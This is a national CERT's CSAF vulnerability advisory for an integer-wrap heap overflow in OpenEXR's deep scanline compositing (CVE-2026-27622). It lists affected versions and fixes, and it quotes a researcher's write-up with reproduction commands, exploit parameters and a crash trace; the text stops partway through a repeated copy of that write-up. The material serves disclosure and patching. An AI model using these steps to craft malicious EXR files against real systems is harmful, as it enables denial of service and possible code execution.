{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Centre (henceforth: NCSC-NL) maintains this portal to enhance access to its information on vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can also retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or being kept up to date in real time. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties, to enable them to take appropriate measures to manage the risks posed to their cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use of, or the inability to use, the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of forum also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-27622",
        "tracking": {
            "current_release_date": "2026-03-23T02:59:11.499794Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-27622",
            "initial_release_date": "2026-03-02T18:40:10.093764Z",
            "revision_history": [
                {
                    "date": "2026-03-02T18:40:10.093764Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-02T18:40:12.265083Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-03T23:25:05.880305Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (1).| CWES updated (1)."
                },
                {
                    "date": "2026-03-03T23:25:16.390669Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-03T23:38:52.884277Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (3).| References created (1).| CWES updated (1)."
                },
                {
                    "date": "2026-03-03T23:38:58.979212Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-04T02:39:45.298750Z",
                    "number": "7",
                    "summary": "References created (1)."
                },
                {
                    "date": "2026-03-04T07:35:10.064813Z",
                    "number": "8",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-04T15:17:18.586252Z",
                    "number": "9",
                    "summary": "Source created.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-04T15:17:24.539223Z",
                    "number": "10",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-04T16:38:59.198773Z",
                    "number": "11",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-04T18:39:04.103602Z",
                    "number": "12",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (14).| Product Identifiers created (17).| Products connected (6).| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-04T18:39:12.842667Z",
                    "number": "13",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-05T00:27:45.422886Z",
                    "number": "14",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (8).| Product Identifiers created (5).| Product Remediations created (10).| Products created (2).| References created (3).| CWES updated (1).| Vendor_assessment created."
                },
                {
                    "date": "2026-03-05T00:27:48.101684Z",
                    "number": "15",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-05T00:44:58.879501Z",
                    "number": "16",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| Products connected (2)."
                },
                {
                    "date": "2026-03-05T00:45:09.339511Z",
                    "number": "17",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-05T21:26:40.166531Z",
                    "number": "18",
                    "summary": "CVSS created.| Products created (3).| Product Identifiers created (3).| Exploits created (1)."
                },
                {
                    "date": "2026-03-05T21:26:45.540353Z",
                    "number": "19",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-20T09:40:30.020593Z",
                    "number": "20",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                }
            ],
            "status": "interim",
            "version": "20"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<3.2.6",
                                "product": {
                                    "name": "vers:unknown/<3.2.6",
                                    "product_id": "CSAFPID-5763878",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=3.3.0|<3.3.8",
                                "product": {
                                    "name": "vers:unknown/>=3.3.0|<3.3.8",
                                    "product_id": "CSAFPID-5763879",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=3.4.0|<3.4.6",
                                "product": {
                                    "name": "vers:unknown/>=3.4.0|<3.4.6",
                                    "product_id": "CSAFPID-5763880",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "OpenEXR"
                    }
                ],
                "category": "vendor",
                "name": "OpenEXR"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5759811"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "OpenEXR"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Enterprise Linux 10"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-3020246"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "OpenEXR"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Enterprise Linux 6"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-3020248"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "OpenEXR"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Enterprise Linux 7"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-3020250"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "OpenEXR"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Enterprise Linux 8"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5759812"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "OpenEXR"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Enterprise Linux 9"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/10",
                                "product": {
                                    "name": "vers:rpm/10",
                                    "product_id": "CSAFPID-2858634",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/o:redhat:enterprise_linux:10"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Enterprise Linux 10"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/6",
                                "product": {
                                    "name": "vers:rpm/6",
                                    "product_id": "CSAFPID-1439321",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/o:redhat:enterprise_linux:6"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Enterprise Linux 6"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/7",
                                "product": {
                                    "name": "vers:rpm/7",
                                    "product_id": "CSAFPID-1439315",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/o:redhat:enterprise_linux:7"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Enterprise Linux 7"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/8",
                                "product": {
                                    "name": "vers:rpm/8",
                                    "product_id": "CSAFPID-1439317",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/o:redhat:enterprise_linux:8"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Enterprise Linux 8"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/9",
                                "product": {
                                    "name": "vers:rpm/9",
                                    "product_id": "CSAFPID-1439319",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/o:redhat:enterprise_linux:9"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Enterprise Linux 9"
                    }
                ],
                "category": "vendor",
                "name": "Red Hat"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.2.3",
                                "product": {
                                    "name": "vers:unknown/3.2.3",
                                    "product_id": "CSAFPID-5759241",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/openexr@3.2.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.2.4",
                                "product": {
                                    "name": "vers:unknown/3.2.4",
                                    "product_id": "CSAFPID-5759242",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/openexr@3.2.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.2.5",
                                "product": {
                                    "name": "vers:unknown/3.2.5",
                                    "product_id": "CSAFPID-5759243",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/openexr@3.2.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.3.0",
                                "product": {
                                    "name": "vers:unknown/3.3.0",
                                    "product_id": "CSAFPID-3021051",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/openexr@3.3.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.3.1",
                                "product": {
                                    "name": "vers:unknown/3.3.1",
                                    "product_id": "CSAFPID-3021052",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/openexr@3.3.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.3.2",
                                "product": {
                                    "name": "vers:unknown/3.3.2",
                                    "product_id": "CSAFPID-3021053",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/openexr@3.3.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.3.3",
                                "product": {
                                    "name": "vers:unknown/3.3.3",
                                    "product_id": "CSAFPID-5759244",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/openexr@3.3.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.3.4",
                                "product": {
                                    "name": "vers:unknown/3.3.4",
                                    "product_id": "CSAFPID-5759245",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/openexr@3.3.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.3.5",
                                "product": {
                                    "name": "vers:unknown/3.3.5",
                                    "product_id": "CSAFPID-5759246",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/openexr@3.3.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.3.6",
                                "product": {
                                    "name": "vers:unknown/3.3.6",
                                    "product_id": "CSAFPID-5759247",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/openexr@3.3.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.3.7",
                                "product": {
                                    "name": "vers:unknown/3.3.7",
                                    "product_id": "CSAFPID-5759248",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/openexr@3.3.7"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.4.0",
                                "product": {
                                    "name": "vers:unknown/3.4.0",
                                    "product_id": "CSAFPID-5759249",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/openexr@3.4.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.4.1",
                                "product": {
                                    "name": "vers:unknown/3.4.1",
                                    "product_id": "CSAFPID-5759250",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/openexr@3.4.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.4.2",
                                "product": {
                                    "name": "vers:unknown/3.4.2",
                                    "product_id": "CSAFPID-5759251",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/openexr@3.4.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.4.3",
                                "product": {
                                    "name": "vers:unknown/3.4.3",
                                    "product_id": "CSAFPID-5759252",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/openexr@3.4.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.4.4",
                                "product": {
                                    "name": "vers:unknown/3.4.4",
                                    "product_id": "CSAFPID-5759253",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/openexr@3.4.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.4.5",
                                "product": {
                                    "name": "vers:unknown/3.4.5",
                                    "product_id": "CSAFPID-5759254",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/openexr@3.4.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=2.3.0|<3.2.6",
                                "product": {
                                    "name": "vers:unknown/>=2.3.0|<3.2.6",
                                    "product_id": "CSAFPID-5757224"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=3.3.0|<3.3.8",
                                "product": {
                                    "name": "vers:unknown/>=3.3.0|<3.3.8",
                                    "product_id": "CSAFPID-5757225"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=3.4.0|<3.4.6",
                                "product": {
                                    "name": "vers:unknown/>=3.4.0|<3.4.6",
                                    "product_id": "CSAFPID-5757226"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "openexr"
                    }
                ],
                "category": "vendor",
                "name": "AcademySoftwareFoundation"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:deb/unknown",
                                        "product": {
                                            "name": "vers:deb/unknown",
                                            "product_id": "CSAFPID-1408023"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "openexr"
                            }
                        ],
                        "category": "product_family",
                        "name": "bookworm"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:deb/unknown",
                                        "product": {
                                            "name": "vers:deb/unknown",
                                            "product_id": "CSAFPID-1408024"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "openexr"
                            }
                        ],
                        "category": "product_family",
                        "name": "bullseye"
                    }
                ],
                "category": "vendor",
                "name": "Debian"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-27622",
            "cwe": {
                "id": "CWE-787",
                "name": "Out-of-bounds Write"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "## Summary\n\nFunction: `CompositeDeepScanLine::readPixels`, reachable from high-level multipart deep read flows (`MultiPartInputFile` + `DeepScanLineInputPart` + `CompositeDeepScanLine`).\n\nVulnerable lines (`src/lib/OpenEXR/ImfCompositeDeepScanLine.cpp`):\n- `total_sizes[ptr] += counts[j][ptr];` (line ~511)\n- `overall_sample_count += total_sizes[ptr];` (line ~514)\n- `samples[channel].resize (overall_sample_count);` (line ~535)\n\nImpact: 32-bit sample-count accumulation wrap leads to undersized allocation, then decode writes with true sample volume, causing heap OOB write in `generic_unpack_deep_pointers` (`src/lib/OpenEXRCore/unpack.c:1374`) (DoS/Crash, memory corruption/RCE).\n\nAttack scenario:\n- Attacker provides multipart deep EXR with many parts and very large sample counts per pixel.\n- Uses compression (RLE/ZIPS) to keep file size relatively small vs decode pressure.\n- The overflow happens in composite sample accounting (`unsigned int`), while pointer progression for decode uses larger counters and reaches out-of-bounds.\n\nTested on: `OpenEXR 4.0.0-dev` (commit 83449669402080874b25ff1fa740649a9e6ea064) but this code has existed since v2.3.0\n\n## Steps to reproduce\n\n[composite_deepscanline_poc_bundle.patch](https://github.com/user-attachments/files/25383205/composite_deepscanline_poc_bundle.patch)\n\nPoC files used:\n- Writer/generator: `poc/composite_deep_scanline_e2e_compressed_poc.cpp`\n- Minimal high-level reader harness: `poc/simple_exr_reader.cpp`\n\nThe reader harness intentionally mimics realistic app behavior: open EXR, iterate parts, select `DEEPSCANLINE`, add sources to `CompositeDeepScanLine`, bind a normal `FrameBuffer`, then call `readPixels`.\n\nBuild with ASAN/UBSAN:\n\n```bash\ncmake -S . 
-B build-asan \\\n  -DOPENEXR_BUILD_POC=ON \\\n  -DCMAKE_BUILD_TYPE=RelWithDebInfo \\\n  -DCMAKE_C_FLAGS='-fsanitize=address,undefined -fno-omit-frame-pointer' \\\n  -DCMAKE_CXX_FLAGS='-fsanitize=address,undefined -fno-omit-frame-pointer' \\\n  -DCMAKE_EXE_LINKER_FLAGS='-fsanitize=address,undefined' \\\n  -DCMAKE_SHARED_LINKER_FLAGS='-fsanitize=address,undefined'\n\ncmake --build build-asan --target composite_writer simple_exr_reader -j\n```\n\nGenerate malicious file (decode-path focused profile):\n\n```bash\nASAN_OPTIONS=detect_leaks=0 timeout 180s \\\n  ./build-asan/poc/composite_writer \\\n  --profile low-ram \\\n  --file /tmp/composite_decode_focus.exr\n```\n\nTrigger:\n\n```bash\nASAN_OPTIONS=detect_leaks=0 timeout 30s \\\n  ./build-asan/poc/simple_exr_reader /tmp/composite_decode_focus.exr\n```\n\nASAN builds are slower. If needed, a non-sanitized build + debugger is faster for iteration.\n\n## Example runs\n\nWriter (abbrev):\n\n```bash\n❯ ./build-asan/poc/composite_writer\nexploit math:\n  benign samples                 : 300\n  malicious parts                : 86\n  malicious samples per part     : 50000000\n  true total samples             : 4300000300\n  uint32 overflow reached        : yes\n  wrapped uint32 total           : 5033004\n  composite Z/A alloc from wrap  : 40264032 bytes (38.40 MiB)\n  per-part unpacked sample bytes : 300000000 bytes (286.10 MiB)\n  min parts to overflow (current benign/samples): 86\nwriting compressed multipart deep EXR: /tmp/composite_deep_scanline_e2e_compressed.exr\nwriting donor malicious part (50000000 samples)\ncopying malicious part 1/86 from donor chunk\n...\nfile size: 26112896 bytes (24.90 MiB)\n```\n\nReader ASAN crash:\n\n```bash\n❯ ./build-asan/poc/simple_exr_reader\nreading /tmp/composite_overflow_optimized.exr with 16 deepscanline parts\n=================================================================\n==175024==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7ed1a55d90b0 at pc 0x7ed1da7854f7 bp 
0x7ffe8c83a680 sp 0x7ffe8c83a670\nWRITE of size 4 at 0x7ed1a55d90b0 thread T0\n    #0 0x7ed1da7854f6 in generic_unpack_deep_pointers /home/pop/sec/openexr/src/lib/OpenEXRCore/unpack.c:1374\n    #1 0x7ed1da7623e9 in exr_decoding_run /home/pop/sec/openexr/src/lib/OpenEXRCore/decoding.c:664\n    #2 0x7ed1dbcb153b in run_decode /home/pop/sec/openexr/src/lib/OpenEXR/ImfDeepScanLineInputFile.cpp:816\n    #3 0x7ed1dbcc597f in Imf_4_0::DeepScanLineInputFile::Data::readData(Imf_4_0::DeepFrameBuffer const&, int, int, bool) /home/pop/sec/openexr/src/lib/OpenEXR/ImfDeepScanLineInputFile.cpp:568\n    #4 0x7ed1dbc01ca4 in Imf_4_0::CompositeDeepScanLine::readPixels(int, int) /home/pop/sec/openexr/src/lib/OpenEXR/ImfCompositeDeepScanLine.cpp:576\n    #5 0x64669005f233 in main /home/pop/sec/openexr/poc/simple_exr_reader.cpp:88\n    #6 0x7ed1d942a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58\n    #7 0x7ed1d942a28a in __libc_start_main_impl ../csu/libc-start.c:360\n    #8 0x6466900601e4 in _start (/home/pop/sec/openexr/build-asan/poc/simple_exr_reader+0x1b1e4) (BuildId: 86b018d0dce48def6ca06be031266f0205c914d2)\n\n0x7ed1a55d90b0 is located 0 bytes after 820132016-byte region [0x7ed1747b5800,0x7ed1a55d90b0)\nallocated by thread T0 here:\n    #0 0x7ed1dd0fe548 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cpp:95\n    #1 0x7ed1dbc29600 in std::__new_allocator<float>::allocate(unsigned long, void const*) /usr/include/c++/13/bits/new_allocator.h:151\n    #2 0x7ed1dbc29600 in std::allocator_traits<std::allocator<float> >::allocate(std::allocator<float>&, unsigned long) /usr/include/c++/13/bits/alloc_traits.h:482\n    #3 0x7ed1dbc29600 in std::_Vector_base<float, std::allocator<float> >::_M_allocate(unsigned long) /usr/include/c++/13/bits/stl_vector.h:381\n    #4 0x7ed1dbc29600 in std::_Vector_base<float, std::allocator<float> >::_M_allocate(unsigned long) /usr/include/c++/13/bits/stl_vector.h:378\n    #5 0x7ed1dbc29600 in 
std::vector<float, std::allocator<float> >::_M_default_append(unsigned long) /usr/include/c++/13/bits/vector.tcc:663\n    #6 0x7ed1dbc00184 in std::vector<float, std::allocator<float> >::resize(unsigned long) /usr/include/c++/13/bits/stl_vector.h:1016\n    #7 0x7ed1dbc00184 in Imf_4_0::CompositeDeepScanLine::readPixels(int, int) /home/pop/sec/openexr/src/lib/OpenEXR/ImfCompositeDeepScanLine.cpp:535\n    #8 0x64669005f233 in main /home/pop/sec/openexr/poc/simple_exr_reader.cpp:88\n    #9 0x7ed1d942a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58\n    #10 0x7ed1d942a28a in __libc_start_main_impl ../csu/libc-start.c:360\n    #11 0x6466900601e4 in _start (/home/pop/sec/openexr/build-asan/poc/simple_exr_reader+0x1b1e4) (BuildId: 86b018d0dce48def6ca06be031266f0205c914d2)\n\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/pop/sec/openexr/src/lib/OpenEXRCore/unpack.c:1374 in generic_unpack_deep_pointers\nShadow bytes around the buggy address:\n  0x7ed1a55d8e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n  0x7ed1a55d8e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n  0x7ed1a55d8f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n  0x7ed1a55d8f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n  0x7ed1a55d9000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n=>0x7ed1a55d9080: 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa\n  0x7ed1a55d9100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n  0x7ed1a55d9180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n  0x7ed1a55d9200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n  0x7ed1a55d9280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n  0x7ed1a55d9300: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\nShadow byte legend (one shadow byte represents 8 application bytes):\n  Addressable:           00\n  Partially addressable: 01 02 03 04 05 06 07\n  Heap left redzone:       fa\n  Freed heap region:       fd\n  Stack left redzone:      f1\n  Stack mid redzone:       f2\n  Stack 
right redzone:     f3\n  Stack after return:      f5\n  Stack use after scope:   f8\n  Global redzone:          f9\n  Global init order:       f6\n  Poisoned by user:        f7\n  Container overflow:      fc\n  Array cookie:            ac\n  Intra object redzone:    bb\n  ASan internal:           fe\n  Left alloca redzone:     ca\n  Right alloca redzone:    cb\n==175024==ABORTING\n```\n\n## Root cause analysis\n\nIn `CompositeDeepScanLine::readPixels`:\n\n1. Per-pixel totals are accumulated in `vector<unsigned int> total_sizes`.\n2. For attacker-controlled large counts across many parts, `total_sizes[ptr]` wraps modulo `2^32`.\n3. `overall_sample_count` is then derived from wrapped totals and used in `samples[channel].resize(overall_sample_count)`.\n4. Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (`generic_unpack_deep_pointers`) overrun the undersized composite sample buffer.\n\n\nAllocation is based on a tiny wrapped value, but decode writes correspond to the true large sample volume.\n\n## Impact\n\nHeap OOB write during decode. This is at minimum a reliable crash/DoS. As heap corruption, this bug could be used for potential remote code execution.",
                    "title": "github - https://github.com/advisories/GHSA-cr4v-6jm6-4963"
                },
                {
                    "category": "description",
                    "text": "OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In CompositeDeepScanLine::readPixels, per-pixel totals are accumulated in vector<unsigned int> total_sizes; for attacker-controlled large counts across many parts, total_sizes[ptr] wraps modulo 2^32. overall_sample_count is then derived from wrapped totals and used in samples[channel].resize(overall_sample_count). Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (generic_unpack_deep_pointers) overrun the undersized composite sample buffer. This vulnerability is fixed in v3.2.6, v3.3.8, and v3.4.6.",
                    "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-27622"
                },
                {
                    "category": "description",
                    "text": "OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In CompositeDeepScanLine::readPixels, per-pixel totals are accumulated in vector<unsigned int> total_sizes; for attacker-controlled large counts across many parts, total_sizes[ptr] wraps modulo 2^32. overall_sample_count is then derived from wrapped totals and used in samples[channel].resize(overall_sample_count). Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (generic_unpack_deep_pointers) overrun the undersized composite sample buffer. This vulnerability is fixed in v3.2.6, v3.3.8, and v3.4.6.",
                    "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-27622"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nFunction: `CompositeDeepScanLine::readPixels`, reachable from high-level multipart deep read flows (`MultiPartInputFile` + `DeepScanLineInputPart` + `CompositeDeepScanLine`).\n\nVulnerable lines (`src/lib/OpenEXR/ImfCompositeDeepScanLine.cpp`):\n- `total_sizes[ptr] += counts[j][ptr];` (line ~511)\n- `overall_sample_count += total_sizes[ptr];` (line ~514)\n- `samples[channel].resize (overall_sample_count);` (line ~535)\n\nImpact: 32-bit sample-count accumulation wrap leads to undersized allocation, then decode writes with true sample volume, causing heap OOB write in `generic_unpack_deep_pointers` (`src/lib/OpenEXRCore/unpack.c:1374`) (DoS/Crash, memory corruption/RCE).\n\nAttack scenario:\n- Attacker provides multipart deep EXR with many parts and very large sample counts per pixel.\n- Uses compression (RLE/ZIPS) to keep file size relatively small vs decode pressure.\n- The overflow happens in composite sample accounting (`unsigned int`), while pointer progression for decode uses larger counters and reaches out-of-bounds.\n\nTested on: `OpenEXR 4.0.0-dev` (commit 83449669402080874b25ff1fa740649a9e6ea064) but this code has existed since v2.3.0\n\n## Steps to reproduce\n\n[composite_deepscanline_poc_bundle.patch](https://github.com/user-attachments/files/25383205/composite_deepscanline_poc_bundle.patch)\n\nPoC files used:\n- Writer/generator: `poc/composite_deep_scanline_e2e_compressed_poc.cpp`\n- Minimal high-level reader harness: `poc/simple_exr_reader.cpp`\n\nThe reader harness intentionally mimics realistic app behavior: open EXR, iterate parts, select `DEEPSCANLINE`, add sources to `CompositeDeepScanLine`, bind a normal `FrameBuffer`, then call `readPixels`.\n\nBuild with ASAN/UBSAN:\n\n```bash\ncmake -S . 
